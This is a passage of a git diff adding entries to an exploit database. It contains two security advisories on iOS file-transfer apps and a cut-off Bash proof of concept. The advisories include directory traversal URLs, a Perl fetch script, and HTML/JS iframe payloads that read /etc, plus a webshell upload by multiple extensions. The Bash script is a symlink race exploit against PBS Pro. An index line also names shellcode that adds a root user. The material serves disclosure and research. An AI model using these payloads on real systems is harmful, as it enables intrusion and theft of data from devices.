 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure Vulnerability",2009-01-05,"Aditya K Sood",windows,remote,0
-32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
+32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,metasploit,linux,local,0
 32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
@@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
 33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
-33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
+33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
@@ -30860,3 +30860,11 @@ id,file,description,date,author,platform,type,port
 34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 'fImg' Parameter Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
 34260,platforms/php/webapps/34260.txt,"odCMS 1.07 'archive.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
 34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Vulnerability",2010-07-06,"Luigi Auriemma",multiple,dos,0
+34262,platforms/linux/shellcode/34262.c,"Shellcode Linux x86 - chmod (777 /etc/passwd & /etc/shadow), Add New Root User (ALI/ALI) & Execute /bin/sh",2014-08-04,"Ali Razmjoo",linux,shellcode,0
+34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-04,Vulnerability-Lab,ios,webapps,8080
+34264,platforms/ios/webapps/34264.txt,"FreeDisk v1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080
+34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 'slideshow.js.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
+34266,platforms/php/webapps/34266.txt,"RunCms 2.1 'check.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
+34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x 'pbs_mom' Insecure Temporary File Creation Vulnerability",2010-07-07,"Bartlomiej Balcerek",linux,local,0
+34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
+34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 'install1.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
diff --git a/platforms/ios/webapps/34263.txt b/platforms/ios/webapps/34263.txt
new file mode 100755
index 000000000..51f17fbf9
--- /dev/null
+++ b/platforms/ios/webapps/34263.txt
@@ -0,0 +1,238 @@
+Document Title:
+===============
+Video WiFi Transfer 1.01 - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1288
+
+
+Release Date:
+=============
+2014-08-02
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1288
+
+
+Common Vulnerability Scoring System:
+====================================
+6.7
+
+
+Product & Service Introduction:
+===============================
+Using this app, you can download videos to a PC or a smartphone from your iPhone through WiFi. The video downloaded can be played back 
+on PC and another smart phones as well as Mac and iPhone because the app converts it into a MP4 video. It only takes a few seconds for 
+the conversion. You would say it is the fastest. Just run the app on the iPhone and open the web browser on your PC or Android. That is 
+all that you are required to do. It is quite simple. In addition to the web browser, a ftp client application is also supported to 
+access the videos. Do not pay money for these functions as the app provides all of them without charging.
+
+(Copy of the Homepage: https://itunes.apple.com/de/app/video-wifi-transfer-mp4-conversion/id892132370 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a Directory Traversal vulnerability in the official Bluefinger App Video WiFi Transfer/MP4 Conversion v1.01 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-08-01: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+BlueFinger Apps
+Product: Video WiFi Transfer/MP4 Conversion - iOS Mobile Web Application 1.01
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been discovered in the official BlueFinger Apps Video WiFi Transfer v1.01 iOS mobile application.
+The vulnerability allows remote attackers to bypass the path restriction of a service to access sensitive app-, web-server or -device information.
+
+The vulnerability is located in the `ftp` (ftp://localhost:8080) service of the wifi `web-server` module. The issue allows an attacker to bypass 
+the regular `folder/path` validation mechnism to access sensitive app web-server or iOS -device information. The attack vector of the issue is on 
+the application-side of the service and to perform malicious request the `GET method` is required to use.
+
+After the start of the web-server by usage of the ftp function, the attacker is able to include 5 more path values (../../../../../) to access 
+unauthorized higher folders outside the mobile application service. In the analysis we saw that the path change of 5 directories is required 
+to bypass. During the tests we accessed the full app service folder and through the directory traversal to web-server configuration files but 
+also the parent device directory.
+
+The security risk of the directory traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) 
+count of 6.7. Exploitation of the path traversal web vulnerability requires no privileged web-application user account or user interaction. 
+Successful exploitation of the directory traversal vulnerability results in mobile application or connected device component compromise.
+
+Request Method(s):
+			[+] GET
+
+Vulnerable Module(s):
+			[+] Directory
+
+Vulnerable Parameter(s):
+			[+] path
+
+Affected Module(s):
+			[+] Parent Directory (ftp://localhost:8080/)
+
+
+Note: The structure of the software is the same like in the official BlueFinger Apps `Photo` WiFi Transfer v1.01 iOS mobile application.
+The same vulnerability is located in both mobile ios software of the bluefinger apps company.
+
+
+Proof of Concept (PoC):
+=======================
+The directory traversal web vulnerability can be exploited by attackers without privileged application user account and user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+Exception:
+50 /private/var/mobile/Applications/CFCEEF6E-AA35-42D6-84EC-BFB518F764B1/Documents/video/../../etc/passwd No such file or directory.
+
+Standard Request:
+ftp://localhost:8080/../../Documents/
+
+PoC: Links
+ftp://localhost:8080/../../../../../../../../../../../../../../../../etc
+ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/
+ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/
+ftp://localhost:8080/../../../../../../../../../../../../../../../../System/
+
+
+Exploit: PoC (PL)
+#!/usr/bin/perl
+use LWP::Simple;
+print "-------------------------------------------\n";
+print "-= Photo WiFi Transfer v1.0.1 - PoC Directory Traversal=-\n";
+print "-------------------------------------------\n\n";
+
+print "Target(ftp://localhost:8080/)\> ";
+chomp($targ = <STDIN>);
+
+print "Path: (/fn25/)\>";
+chomp($path=<STDIN>);
+
+$url = "../../../../../../../../etc/";
+$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
+print "[+] Connected to: $page\n";
+
+
+Exploit: PoC (HTML)
+<html>
+<head><body><title></title>
+<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../etc>
+<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/>
+<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/>
+<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../System/>
+</body></head>
+<html>
+
+
+Exploit: PoC (JS)
+<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3E%3C/title%3E%0A%3Ciframe%20src%3Dftp%3A//
+localhost%3A8080/../../../../../../../../../../../../../../../../etc%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/
+../../../../../../../../../../../../../../../../usr/%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/../../../../../
+../../../../../../../../../../../Applications/%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/../../../../../../../
+../../../../../../../../../System/%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>
+
+
+--- PoC Console Logs ---
+Applications		14.03.2014 	19:06:00
+Developer		18.08.2013 	06:19:00
+Library			20.10.2013 	06:32:00
+System			17.10.2013 	08:08:00
+bin			03.07.2014 	18:13:00
+cores			18.08.2013 	05:56:00
+Datei:etc	1 KB 	20.10.2013 	06:32:00
+private			05.01.2014 	22:18:00
+sbin			03.07.2014 	18:13:00
+Datei:tmp	1 KB 	20.10.2013 	06:32:00
+usr			20.10.2013 	06:23:00
+Datei:var	1 KB 	20.10.2013 	06:32:00
+
+300: ftp://localhost:8080/../../../../../../../../
+200: filename content-length last-modified file-type
+201: "Applications" 0 Sun%2C%2014%20Mar%202014%2019%3A06%3A00 DIRECTORY 
+201: "Developer" 0 Sun%2C%2018%20Aug%202013%2006%3A19%3A00 DIRECTORY 
+201: "Library" 0 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 DIRECTORY 
+201: "System" 0 Sun%2C%2017%20Oct%202013%2008%3A08%3A00 DIRECTORY 
+201: "bin" 0 Sun%2C%2003%20Jul%202014%2018%3A13%3A00 DIRECTORY 
+201: "cores" 0 Sun%2C%2018%20Aug%202013%2005%3A56%3A00 DIRECTORY 
+201: "etc" 11 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE 
+201: "private" 0 Sun%2C%2005%20Jan%202014%2022%3A18%3A00 DIRECTORY 
+201: "sbin" 0 Sun%2C%2003%20Jul%202014%2018%3A13%3A00 DIRECTORY 
+201: "tmp" 15 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE 
+201: "usr" 0 Sun%2C%2020%20Oct%202013%2006%3A23%3A00 DIRECTORY 
+201: "var" 11 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE 
+
+Note: The traversal becomes visible after the 5th path/folder request and affects like regular the full app path via web-server. (_eTiGb+6)
+The issue is the same vulnerability like in the VL-ID 1286. The producer only changed the software name and converter to ensure that 
+video can be transfered then pictures.
+
+
+Solution - Fix & Patch:
+=======================
+The directory traversal web vulnerability can be patched by a secure filter and restriction mechanism in the GET method request of the directory/path name value module.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal web vulnerability in the ftp service of the mobile application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/34264.txt b/platforms/ios/webapps/34264.txt
new file mode 100755
index 000000000..e3cc5f852
--- /dev/null
+++ b/platforms/ios/webapps/34264.txt
@@ -0,0 +1,296 @@
+Document Title:
+===============
+FreeDisk v1.01 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1287
+
+
+Release Date:
+=============
+2014-08-01
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1287
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Product & Service Introduction:
+===============================
+Transfer files between your iPhone/iPod/iPad and your computers without iTunes! Just start FreeDisk, and your iDevice is automatically 
+turned into a wifi hard drive. You can then connect your iDevice to your computers, and use it as a regular hard drive, and easily 
+transfer files. No need for third part software, or iTunes, to finally exchange files between your iDevices and your computers! 
+FreeDisk can also turn your iDevice into an internet server to share your files with other smartphones (iOS, Android, Windows...) !
+Last but not least, all your data are protected and can only be read when the app is running.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/free-disk-turn-your-iphone/id896356251 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered multiple vulnerabilities in the official  FreeDisk v1.01 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-08-01: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Sebastien BUET
+Product: FreeDisk - iOS Mobile Web Application 1.01
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official  FreeDisk v1.01 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific 
+path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with 
+malicious `filename` values in the `uploadfile` POST method request to compromise the mobile web-application. The local file/path 
+include execution occcurs in the index `file list` context next to the vulnerable `filename` item value. The attacker is able to 
+inject the local malicious file request by usage of the available `wifi interface` upload form.
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute 
+different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to 
+inject is POST. 
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count 
+of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction. 
+Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Service(s):
+				[+] FreeDisk v1.01
+
+Vulnerable Module(s):
+				[+] upload
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] FreeDisk App Index File Dir Listing (http://localhost:8080/)
+
+
+1.2
+An arbitrary file upload web vulnerability has been discovered in the official  FreeDisk v1.01 iOS mobile web-application.
+The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
+
+The vulnerability is located in the `upload` module. Remote attackers are able to upload a php or js web-shells by renaming the file with 
+multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension 
+`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file 
+extension and can access the application file with elevated access rights. 
+
+The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.4.
+Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
+Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Service(s):
+				[+] FreeDisk v1.01
+
+Vulnerable Module(s):
+				[+] upload
+
+Vulnerable Parameter(s):
+				[+] filename (multiple extensions)
+
+Affected Module(s):
+				[+] FreeDisk App Index File Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+PoC: LFI > FreeDisk App Index File Dir Listing (http://localhost:8080/)
+
+/8Oe/3rG8NqF1H9y6jCDRQWTNfOe9OJxmRjy9Ns+DSZRbq5em95UgEIQSBQABd19VWa9ks3W+JruupQrKsaRonTpwgEAjQ6K/hznXLOHz8w7wp5p7spDJNu9IpG6BCz
+KOachYJtTbCcRz8fj+BQIDs47ui9n7d5x4yMm5F0zSNNWvWYNs2W558TaWY7MOaawW+xiaVIlKpCgFUinIqr7weiUSwbRu/319ci1JEZDAMAyFEjixHo1GlZtvvvkn
+NJ7Jtkf2ShBiuqVcF3VBdTkN1ORViHhViHt4rELFYjKNHjyKEIBgMylQqKTTnlRar+RImEAgoEZDm9XoJh9NnIt9Z386y1W2Mjl9Uhe+exfsmYPmlCS5MfsrHl6a5e
+KWH8opyvCJdB0ePHiUejxMKhRTAbMcOV3X05q4Zd0ecTr+0IOi6zoMb23hqIA7TI2oN7iTO0+fxqgmvsmY+DdVp52UN9vT0IIQgFAplFHIxVnq1s3GhyAihqW2cNauWs741kCO/k4kxLlxJy2B1qYpAJBKhp6cHv9+PaZr4/f6rPvgpvZbWohBMdXUVlmUBsGVTq1rKujvk5UtN
+1prpWrMsi3A4rOrANM0Z6+B6HoamYrGYUrNkMsnY2Bhbt24F4NUDb/DakTCepSG+f/uNrL2lBSEEsViM3t5eTNNUAvKFHb0VCxOPjxMILGLVqlUM2zZvHjnB5o23q
+XV/OBzGMIycCe3LPNUtCBONRlVUXJt9OI4j04e5/n+UufzPh5Rt24yMjKiNig0bNmBZFrFYbNYJ7asEkgFjWacRQpvTOvgiQRSM7JCvN8D1BPlS7H8DAE2nLCe/T
+ZDiAAAAAElFTkSuQmCC"></a></td></tr><tr>
+<td word-wrap="break-all" align="center">
+<a href="<./[LOCAL FILE INCLUDE VULNERABILITY!].png"><./[LOCAL FILE INCLUDE VULNERABILITY!].png"></a></td></tr></table></td><td >
+<table width="192 px" border="0" align="center"><tr><td align="center" height="133"><a  href="IMG_0650.JPG">
+<img  src="data:image/png;
+
+
+--- PoC Session Logs [POST] (LFI) ---
+Status: 200[OK]
+POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[352481] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------17662256993564
+Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
+Content-Type: image/png
+
+Status: 200[OK]
+GET http://localhost:8080/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[317203] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[317203]
+      Date[Do., 31 Juli 2014 13:38:34 GMT]
+
+
+
+
+1.2
+The arbitrary file upload web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+PoC: AFU > FreeDisk App Index File Dir Listing (http://localhost:8080/)
+
+/8Oe/3rG8NqF1H9y6jCDRQWTNfOe9OJxmRjy9Ns+DSZRbq5em95UgEIQSBQABd19VWa9ks3W+JruupQrKsaRonTpwgEAjQ6K/hznXLOHz8w7wp5p7spDJNu9IpG6BCz
+KOachYJtTbCcRz8fj+BQIDs47ui9n7d5x4yMm5F0zSNNWvWYNs2W558TaWY7MOaawW+xiaVIlKpCgFUinIqr7weiUSwbRu/319ci1JEZDAMAyFEjixHo1GlZtvvvkn
+NJ7Jtkf2ShBiuqVcF3VBdTkN1ORViHhViHt4rELFYjKNHjyKEIBgMylQqKTTnlRar+RImEAgoEZDm9XoJh9NnIt9Z386y1W2Mjl9Uhe+exfsmYPmlCS5MfsrHl6a5e
+KWH8opyvCJdB0ePHiUejxMKhRTAbMcOV3X05q4Zd0ecTr+0IOi6zoMb23hqIA7TI2oN7iTO0+fxqgmvsmY+DdVp52UN9vT0IIQgFAplFHIxVnq1s3GhyAihqW2cNau
+Ws741kCO/k4kxLlxJy2B1qYpAJBKhp6cHv9+PaZr4/f6rPvgpvZbWohBMdXUVlmUBsGVTq1rKujvk5UtN
+1prpWrMsi3A4rOrANM0Z6+B6HoamYrGYUrNkMsnY2Bhbt24F4NUDb/DakTCepSG+f/uNrL2lBSEEsViM3t5eTNNUAvKFHb0VCxOPjxMILGLVqlUM2zZvHjnB5o23q
+XV/OBzGMIycCe3LPNUtCBONRlVUXJt9OI4j04e5/n+UufzPh5Rt24yMjKiNig0bNmBZFrFYbNYJ7asEkgFjWacRQpvTOvgiQRSM7JCvN8D1BPlS7H8DAE2nLCe/T
+ZDiAAAAAElFTkSuQmCC"></a></td></tr><tr><td word-wrap="break-all" align="center">
+<a href="<./webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"><webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"></a></td></tr></table></td><td >
+<table width="192 px" border="0" align="center"><tr><td align="center" height="133"><a  href="IMG_0650.JPG">
+<img  src="data:image/png;
+
+
+PoC: http://localhost:8080/webshell.png.jpg.html.js.jpg.png
+
+--- PoC Session Logs [POST] (AFU) ---
+Status: 200[OK]
+POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[359908] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------3032116335563
+Content-Disposition: form-data; name="file"; filename="webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"
+Content-Type: image/png
+
+Status: 200[OK]
+GET http://localhost:8080/webshell.png.jpg.html.js.jpg.png Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[317203] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[317203]
+      Date[Do., 31 Juli 2014 13:45:00 GMT]
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The file inlcude vulnerability can be patched by a secure parse and encode of the filename value in the upload file POST method request.
+
+1.2
+The arbitrary file upload issue can be fixed by a secure restriction and filter procedure in the filename type validation mechanism.
+Restrict the input and check for extentions to prevent arbitrary file upload with further exploitation.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability in the filename value is estimated as high.
+
+1.2
+The security risk of the arbitrary file upload web vulnerability in the file submit function is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/linux/local/34267.sh b/platforms/linux/local/34267.sh
new file mode 100755
index 000000000..0c245911c
--- /dev/null
+++ b/platforms/linux/local/34267.sh
@@ -0,0 +1,55 @@
+source: http://www.securityfocus.com/bid/41449/info
+
+Altair Engineering PBS Pro creates temporary files in an insecure manner.
+
+An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.
+
+Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.
+
+Versions prior to PBS Pro 10.4 are vulnerable. 
+
+#!/bin/bash
+#set -x
+# PBS Pro < 10.4 o+w race condition vulnerability Proof Of Concept by Bartlomiej Balcerek - bartol@pwr.wroc.pl 
+# Must be run on submitting host and will create /tmp/pbs_test_by_bartol file on exec host as a next job owner UID
+echo Compiling racer...
+cat << EOF  | gcc -x c -o racer.x -
+//repeatedly tries to create arbitrary choosen link
+#include <unistd.h>
+
+int main(int argc, char* argv[])
+{
+ if (argc < 3)  {printf("%s","Need 2 arguments!");exit(1);}
+ while (1) symlink(argv[1],argv[2]); 
+}; 
+EOF
+if [ ! -x racer.x ]; then echo "Cannot compile C code, do you have gcc installed ?" ;exit 1; fi 
+echo Submitting job...
+jobname=`echo hostname | qsub -j oe -o out.txt` 
+sleep 2
+host=`cat out.txt`
+if [ -z $host ]; then echo "Cannot determine next execution host, is quere working ?"; exit 1;fi
+rm out.txt
+echo Next job will be run on $host
+echo Copying racer to $host...
+scp ./racer.x $host:/tmp
+echo Calculating job id...
+jobid=`echo $jobname | cut -d . -f 1`
